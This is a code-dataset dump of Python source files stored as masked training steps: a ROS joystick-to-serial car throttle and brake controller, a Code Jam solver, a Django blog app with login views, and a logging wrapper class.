if (first_d == 0):
ser.write("2000a".encode('utf-8'))
print("Joystick button 5 pressed.")
first_d = 1
if(button-button_!= 0):
if(button4 == 0):
first_a = 0
if(button5 == 0):
first_d = 0
ser.write("3000a".encode('utf-8'))
print("Joystick button released.")
button = button_
# Intializes everything
def start():
rospy.Subscriber("joy", Joy, callback)
# starts the node
rospy.init_node('Joy2Turtle')
rospy.spin()
if __name__ == '__main__':
start()
|
normal
|
{
"blob_id": "14a357f3dfb3d59f1d8cfd566edeaf8b0e5bb56d",
"index": 374,
"step-1": "<mask token>\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\n<mask token>\n",
"step-2": "<mask token>\nif platform == 'linux' or platform == 'linux2':\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == 'darwin':\n pass\nelif platform == 'win32':\n ser = serial.Serial('COM16')\n<mask token>\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-3": "<mask token>\nif platform == 'linux' or platform == 'linux2':\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == 'darwin':\n pass\nelif platform == 'win32':\n ser = serial.Serial('COM16')\n<mask token>\noldvar = 0\nfirst_a = 0\nfirst_d = 0\nbase_throttle = 5500\npeak_throttle = 6500\nbase_brake = 450\npeak_brake = 600\nbutton = 0\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-4": "import rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\nimport serial\nfrom sys import platform\nif platform == 'linux' or platform == 'linux2':\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == 'darwin':\n pass\nelif platform == 'win32':\n ser = serial.Serial('COM16')\n<mask token>\noldvar = 0\nfirst_a = 0\nfirst_d = 0\nbase_throttle = 5500\npeak_throttle = 6500\nbase_brake = 450\npeak_brake = 600\nbutton = 0\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n axis1 = -data.axes[1]\n axis3 = -data.axes[3]\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n button_ = button1 + button4 + button5\n if axis1 > 0.1:\n bval = int(axis1 * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n print('Brake')\n elif axis1 < -0.1 and axis3 < 0.1:\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle -\n base_throttle) * 0.5 + base_throttle)\n if abs(tval - oldvar) > 5:\n ser.write(str(tval).encode('utf-8'))\n ser.write('a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Throttle')\n oldvar = tval\n elif axis1 > -0.1 and axis1 < 0.1:\n ser.write('4000a'.encode('utf-8'))\n ser.write('450a'.encode('utf-8'))\n print('Zero Throttle')\n print(axis1)\n print(axis3)\n if button1 == 1:\n print('Emergency Brake')\n ser.write('4600a'.encode('utf-8'))\n ser.write('600a'.encode('utf-8'))\n if button4 and button5 == 0:\n if first_a == 0:\n ser.write('1000a'.encode('utf-8'))\n print('Joystick button 4 pressed.')\n first_a = 1\n if button5 and button4 == 0:\n if first_d == 0:\n ser.write('2000a'.encode('utf-8'))\n print('Joystick button 5 pressed.')\n first_d = 1\n if button - button_ != 0:\n if button4 == 0:\n first_a = 0\n if button5 == 0:\n first_d = 0\n ser.write('3000a'.encode('utf-8'))\n print('Joystick button released.')\n button = button_\n\n\ndef start():\n rospy.Subscriber('joy', Joy, callback)\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-5": "#!/usr/bin/env python\nimport rospy\nfrom geometry_msgs.msg import Twist\nfrom sensor_msgs.msg import Joy\n\nimport serial\nfrom sys import platform\nif platform == \"linux\" or platform == \"linux2\":\n ser = serial.Serial('/dev/ttyACM0')\nelif platform == \"darwin\":\n pass\nelif platform == \"win32\":\n # Windows...\n ser = serial.Serial('COM16')\n\"\"\"\nIn this test code we are testing basic vehicle control over the network\nwe use ROS middleware to send the control commands \nThis script runs at the remote driver end. \nReceives joystick messages (subscribed to Joy topic)\nthen converts the joystick inputs into commands\n\nWE ARE NOT USING THIS METHOD NOW \n--- WE HAVE SEPERATED OUT ALL THE STREAMS FROM THE JOYSTICK\n\n\"\"\"\n\noldvar = 0\nfirst_a = 0\nfirst_d = 0\n# Configuatrion tuned for CAR in LOW speed\nbase_throttle = 5500\npeak_throttle = 6500\nbase_brake = 450\npeak_brake = 600\nbutton = 0\n\n\ndef callback(data):\n global first_a\n global first_d\n global oldvar\n global base_throttle\n global peak_throttle\n global base_brake\n global peak_brake\n global button\n # print data\n axis1 = -data.axes[1]\n axis3 = -data.axes[3] # in logitech axis 3 is axis 4 confirm with ashish\n button1 = data.buttons[1]\n button4 = data.buttons[4]\n button5 = data.buttons[5]\n\n button_ = button1+button4+button5\n\n if axis1 > 0.1:\n bval = int((axis1) * (peak_brake - base_brake) + base_brake)\n print(bval)\n ser.write(str(bval).encode('utf-8'))\n ser.write(\"a\".encode('utf-8'))\n #### ser.write(\"4000a\".encode('utf-8')) #throttle released on braking\n print(\"Brake\")\n elif (axis1 < -0.1 and axis3 < 0.1):\n tval = int((axis1 * -1 + axis3 * -1) * (peak_throttle - base_throttle) * 0.5 + base_throttle)\n if (abs(tval - oldvar) > 5):\n #print(tval)\n ser.write(str(tval).encode('utf-8'))\n ser.write(\"a\".encode('utf-8'))\n ser.write(\"450a\".encode('utf-8')) # brake released on acceleration\n print(\"Throttle\")\n oldvar = tval\n elif (axis1 > -0.1 and axis1 < 0.1):\n ser.write(\"4000a\".encode('utf-8'))\n ser.write(\"450a\".encode('utf-8')) # brake released\n print(\"Zero Throttle\")\n print (axis1)\n print (axis3)\n\n if button1 == 1:\n print(\"Emergency Brake\")\n ser.write(\"4600a\".encode('utf-8')) # throttle released\n ser.write(\"600a\".encode('utf-8')) # brake engaged\n\n if (button4 and button5 == 0):\n if (first_a == 0):\n ser.write(\"1000a\".encode('utf-8'))\n print(\"Joystick button 4 pressed.\")\n first_a = 1\n if (button5 and button4 == 0):\n if (first_d == 0):\n ser.write(\"2000a\".encode('utf-8'))\n print(\"Joystick button 5 pressed.\")\n first_d = 1\n\n if(button-button_!= 0):\n if(button4 == 0):\n first_a = 0\n if(button5 == 0):\n first_d = 0\n ser.write(\"3000a\".encode('utf-8'))\n print(\"Joystick button released.\")\n button = button_\n\n# Intializes everything\ndef start():\n rospy.Subscriber(\"joy\", Joy, callback)\n # starts the node\n rospy.init_node('Joy2Turtle')\n rospy.spin()\n\n\nif __name__ == '__main__':\n start()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# coding=utf-8
"""
author = jamon
"""
|
normal
|
{
"blob_id": "00790b9d2648d19a37d1d1864e7fdeab0f59f764",
"index": 4266,
"step-1": "<mask token>\n",
"step-2": "# coding=utf-8\n\"\"\"\nauthor = jamon\n\"\"\"",
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0,
1
]
}
|
[
0,
1
] |
import os
import math
from collections import defaultdict
__author__ = 'steven'
question='qb'
fs={'t1','small.in','large'}
def getmincost(n,c,f,x):
t=0.0
for i in range(0,n):
t+=1/(2+f*i)
t=t*c
t+=x/(2+f*n)
ct=getmincostnshift(n,c,f,x)
return min(t,ct);
def getmincostnshift(n,c,f,x):
t=0.0
n-=1;
for i in range(0,n):
t+=1/(2+f*i)
t=t*c
t+=x/(2+f*n)
return t
def getminn(c,f,x):
return int(math.ceil((x*f-2*c)/(c*f)))
def solver(c,f,x):
if (x*f-2*c)<0:
return x/2
minn=getminn(c,f,x)
return getmincost(minn,c,f,x)
for s in fs:
print question+s
f='./'+question+s
if os.path.isfile('./'+question+s):
ls=open(f)
noq=(int)(ls.readline())
fout=open(question+s+'-a','w')
print noq
for i in range(0,noq):
fa=ls.readline()
fa=fa.split();
c, f, x=[float(s) for s in fa]
fout.write('Case #%d: %f\n'%(i+1,solver(c,f,x)))
#Case #1: 7
#Case #2: Bad magician!
#Case #3: Volunteer cheated!
|
normal
|
{
"blob_id": "8fee548466abf6d35ea180f8de4e52a9b8902d3f",
"index": 1025,
"step-1": "import os\nimport math\nfrom collections import defaultdict\n__author__ = 'steven'\n\nquestion='qb'\nfs={'t1','small.in','large'}\ndef getmincost(n,c,f,x):\n t=0.0\n\n for i in range(0,n):\n t+=1/(2+f*i)\n t=t*c\n t+=x/(2+f*n)\n ct=getmincostnshift(n,c,f,x)\n return min(t,ct);\n\ndef getmincostnshift(n,c,f,x):\n t=0.0\n n-=1;\n\n for i in range(0,n):\n t+=1/(2+f*i)\n t=t*c\n t+=x/(2+f*n)\n return t\ndef getminn(c,f,x):\n return int(math.ceil((x*f-2*c)/(c*f)))\ndef solver(c,f,x):\n if (x*f-2*c)<0:\n return x/2\n minn=getminn(c,f,x)\n return getmincost(minn,c,f,x)\n\n\nfor s in fs:\n print question+s\n f='./'+question+s\n if os.path.isfile('./'+question+s):\n ls=open(f)\n noq=(int)(ls.readline())\n fout=open(question+s+'-a','w')\n print noq\n for i in range(0,noq):\n fa=ls.readline()\n fa=fa.split();\n c, f, x=[float(s) for s in fa]\n fout.write('Case #%d: %f\\n'%(i+1,solver(c,f,x)))\n\n#Case #1: 7\n#Case #2: Bad magician!\n#Case #3: Volunteer cheated!\n\n\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
from django.shortcuts import render, redirect
from django.contrib import messages
from django.contrib.auth import authenticate, login, logout
from .models import Post
from django.shortcuts import redirect
from django.core.exceptions import ObjectDoesNotExist
def index(request):
blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]
context = {'Post': blogs}
return render(request, 'blogapp/index.html', context)
def blogs(request):
return render(request, template_name='blogapp/blog.html')
def detail(request, slug):
try:
post = Post.objects.get(slug=slug)
context = {'post': post}
return render(request, 'blogapp/detail.html', context)
except ObjectDoesNotExist:
return render(request, template_name='blogapp/detail.html')
def about(request):
return render(request, template_name='blogapp/about.html')
def loginPage(request):
# form = CreateUserForm()
# context = {'form': form}
if request.method == 'POST':
username = request.POST.get('username')
password = request.POST.get('password1')
user = authenticate(username=username, password=password)
if user is not None:
login(request, user)
return redirect('index')
else:
messages.error(request, 'Username or Password Incorrect')
return render(request, 'accounts/login.html',)
else:
return render(request, 'accounts/login.html',)
def logoutUser(request):
logout(request)
return redirect('login')
def contact(request):
return render(request, template_name='blogapp/contact.html')
def products(request):
return render(request, template_name='mainapp/products.html')
|
normal
|
{
"blob_id": "aec374ffa368755350d0d75c96860f760e8524e1",
"index": 7301,
"step-1": "<mask token>\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\n<mask token>\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')\n",
"step-3": "<mask token>\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\ndef contact(request):\n return render(request, template_name='blogapp/contact.html')\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')\n",
"step-4": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import Post\nfrom django.shortcuts import redirect\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\n\ndef loginPage(request):\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html')\n else:\n return render(request, 'accounts/login.html')\n\n\ndef logoutUser(request):\n logout(request)\n return redirect('login')\n\n\ndef contact(request):\n return render(request, template_name='blogapp/contact.html')\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')\n",
"step-5": "from django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom .models import Post\nfrom django.shortcuts import redirect\nfrom django.core.exceptions import ObjectDoesNotExist\n\n\ndef index(request):\n blogs = Post.objects.filter(status=1).order_by('-created_on')[:10]\n context = {'Post': blogs}\n return render(request, 'blogapp/index.html', context)\n\ndef blogs(request):\n return render(request, template_name='blogapp/blog.html')\n\n\ndef detail(request, slug):\n try:\n post = Post.objects.get(slug=slug)\n context = {'post': post}\n return render(request, 'blogapp/detail.html', context)\n except ObjectDoesNotExist:\n return render(request, template_name='blogapp/detail.html')\n\n\ndef about(request):\n return render(request, template_name='blogapp/about.html')\n\ndef loginPage(request):\n\n # form = CreateUserForm()\n # context = {'form': form}\n if request.method == 'POST':\n username = request.POST.get('username')\n password = request.POST.get('password1')\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n return redirect('index')\n else:\n messages.error(request, 'Username or Password Incorrect')\n return render(request, 'accounts/login.html',)\n else:\n return render(request, 'accounts/login.html',)\n\n\ndef logoutUser(request):\n\n logout(request)\n return redirect('login')\n\n\n\ndef contact(request):\n return render(request, template_name='blogapp/contact.html')\n\n\ndef products(request):\n return render(request, template_name='mainapp/products.html')",
"step-ids": [
6,
7,
8,
9,
10
]
}
|
[
6,
7,
8,
9,
10
] |
# -*- coding: utf-8 -*-
from .log_config import LogBase
import os
__all__ = ['MyLog']
class MyLog(LogBase):
"""
功能:
将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz
参数:
:param dir_path: 日志记录的路径,默认是当前路径下的log文件夹
:param logger_name: logger对象的名字
:param info_name: 保存info等级的文件名字
:param error_name:
:param warning_name:
:param debug_name:
:param interval: 压缩日志的频率,默认是7天
:param detail: bool值,记录日志是否为详细记录
:param debug: 是否记录debug,默认不记录
:param info: 是否记录info,默认记录
:param error:
:param warning:
实例方法:
get_logger()-->logger
使用举例:
# 记录四种类型的日志
logger = MyLog(debug=True).get_logger()
logger.info('info')
logger.debug('debug')
logger.error('error')
logger.warning('warning')
# # # # # # # # # # # # # # # # # # # # # # # # #
# 只记录错误日志
logger = MyLog(info=False,warning=False).get_logger()
logger.info('info')
logger.debug('debug')
logger.error('error')
logger.warning('warning')
注意:
MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.
例如:
mylog = MyLog('./logs/logs/')
mylog2 = MyLog()
logger = mylog.get_logger()
logger2 = mylog2.get_logger()
logger.info('info')
logger2 = MyLog('./logs/logs2/').get_logger()
logger2.info('info2')
以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下
"""
def __init__(self, log_path: str = './logs/', **kwargs):
self.type_need(log_path, str)
if not log_path.endswith('/'):
log_path += '/'
if not os.path.exists(log_path):
os.makedirs(log_path)
super(MyLog, self).__init__(dir_path=log_path, **kwargs)
def get_logger(self):
return self._get_logger()
@staticmethod
def type_need(parm, type_):
if not isinstance(parm, type_):
raise TypeError(f'expect {type_},but got {type(parm)}')
|
normal
|
{
"blob_id": "3a9987ac326131878b80cb819e3d06ce2f4cb054",
"index": 8461,
"step-1": "<mask token>\n\n\nclass MyLog(LogBase):\n <mask token>\n <mask token>\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
"step-2": "<mask token>\n\n\nclass MyLog(LogBase):\n \"\"\"\n 功能:\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\n\n 参数:\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\n :param logger_name: logger对象的名字\n :param info_name: 保存info等级的文件名字\n :param error_name:\n :param warning_name:\n :param debug_name:\n :param interval: 压缩日志的频率,默认是7天\n :param detail: bool值,记录日志是否为详细记录\n :param debug: 是否记录debug,默认不记录\n :param info: 是否记录info,默认记录\n :param error:\n :param warning:\n 实例方法:\n get_logger()-->logger\n\n 使用举例:\n # 记录四种类型的日志\n logger = MyLog(debug=True).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n\n # # # # # # # # # # # # # # # # # # # # # # # # #\n\n # 只记录错误日志\n logger = MyLog(info=False,warning=False).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n 注意:\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\n 例如:\n\n mylog = MyLog('./logs/logs/')\n mylog2 = MyLog()\n logger = mylog.get_logger()\n logger2 = mylog2.get_logger()\n logger.info('info')\n\n logger2 = MyLog('./logs/logs2/').get_logger()\n logger2.info('info2')\n\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\n\n\n\n \"\"\"\n\n def __init__(self, log_path: str='./logs/', **kwargs):\n self.type_need(log_path, str)\n if not log_path.endswith('/'):\n log_path += '/'\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
"step-3": "<mask token>\n__all__ = ['MyLog']\n\n\nclass MyLog(LogBase):\n \"\"\"\n 功能:\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\n\n 参数:\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\n :param logger_name: logger对象的名字\n :param info_name: 保存info等级的文件名字\n :param error_name:\n :param warning_name:\n :param debug_name:\n :param interval: 压缩日志的频率,默认是7天\n :param detail: bool值,记录日志是否为详细记录\n :param debug: 是否记录debug,默认不记录\n :param info: 是否记录info,默认记录\n :param error:\n :param warning:\n 实例方法:\n get_logger()-->logger\n\n 使用举例:\n # 记录四种类型的日志\n logger = MyLog(debug=True).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n\n # # # # # # # # # # # # # # # # # # # # # # # # #\n\n # 只记录错误日志\n logger = MyLog(info=False,warning=False).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n 注意:\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\n 例如:\n\n mylog = MyLog('./logs/logs/')\n mylog2 = MyLog()\n logger = mylog.get_logger()\n logger2 = mylog2.get_logger()\n logger.info('info')\n\n logger2 = MyLog('./logs/logs2/').get_logger()\n logger2.info('info2')\n\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\n\n\n\n \"\"\"\n\n def __init__(self, log_path: str='./logs/', **kwargs):\n self.type_need(log_path, str)\n if not log_path.endswith('/'):\n log_path += '/'\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
"step-4": "from .log_config import LogBase\nimport os\n__all__ = ['MyLog']\n\n\nclass MyLog(LogBase):\n \"\"\"\n 功能:\n 将日志分日志等级记录,并自动压缩2019-11-11.info.log.gz\n\n 参数:\n :param dir_path: 日志记录的路径,默认是当前路径下的log文件夹\n :param logger_name: logger对象的名字\n :param info_name: 保存info等级的文件名字\n :param error_name:\n :param warning_name:\n :param debug_name:\n :param interval: 压缩日志的频率,默认是7天\n :param detail: bool值,记录日志是否为详细记录\n :param debug: 是否记录debug,默认不记录\n :param info: 是否记录info,默认记录\n :param error:\n :param warning:\n 实例方法:\n get_logger()-->logger\n\n 使用举例:\n # 记录四种类型的日志\n logger = MyLog(debug=True).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n\n # # # # # # # # # # # # # # # # # # # # # # # # #\n\n # 只记录错误日志\n logger = MyLog(info=False,warning=False).get_logger()\n logger.info('info')\n logger.debug('debug')\n logger.error('error')\n logger.warning('warning')\n 注意:\n MyLog()的实例只会同时存在一个,默认记录首次创建实例的属性.\n 例如:\n\n mylog = MyLog('./logs/logs/')\n mylog2 = MyLog()\n logger = mylog.get_logger()\n logger2 = mylog2.get_logger()\n logger.info('info')\n\n logger2 = MyLog('./logs/logs2/').get_logger()\n logger2.info('info2')\n\n 以上两个logger logger2,会以logger(第一次创建实例)的属性为准,日志会存放在./logs/logs/下\n\n\n\n \"\"\"\n\n def __init__(self, log_path: str='./logs/', **kwargs):\n self.type_need(log_path, str)\n if not log_path.endswith('/'):\n log_path += '/'\n if not os.path.exists(log_path):\n os.makedirs(log_path)\n super(MyLog, self).__init__(dir_path=log_path, **kwargs)\n\n def get_logger(self):\n return self._get_logger()\n\n @staticmethod\n def type_need(parm, type_):\n if not isinstance(parm, type_):\n raise TypeError(f'expect {type_},but got {type(parm)}')\n",
